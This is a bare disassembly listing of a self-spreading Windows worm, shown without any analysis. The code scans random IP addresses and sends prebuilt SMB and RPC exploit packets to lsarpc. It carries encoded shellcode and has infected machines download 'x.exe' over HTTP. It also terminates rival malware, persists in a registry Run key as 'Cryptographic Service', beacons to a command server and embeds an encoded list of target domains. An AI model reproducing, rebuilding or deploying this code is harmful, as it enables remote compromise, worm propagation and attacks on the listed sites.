push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31421094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4 ; InterlockedIncrement
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx ; Sleep
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
push eax
call dword_3142115C ; inet_ntoa
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi ; lstrcpyA
push offset byte_314242B8
call dword_31421084 ; lstrlenA
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi ; Sleep
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi ; Sleep
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi ; Sleep
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008 ; RegQueryValueExA
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000 ; RegCreateKeyExA
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004 ; RegSetValueExA
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26 ; Process32First
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0 ; OpenProcess
push 0
push eax
call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20 ; Process32Next
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C ; GetSystemDirectoryA
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31421084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054 ; WinExec
push 1F4h
call dword_31421094 ; Sleep
push 0
call dword_314210E0 ; ExitProcess
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048 ; GetModuleFileNameA
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_31421068 ; lstrcpyA
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C ; lstrcmpiA
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044 ; VirtualAlloc
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040 ; VirtualFree
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
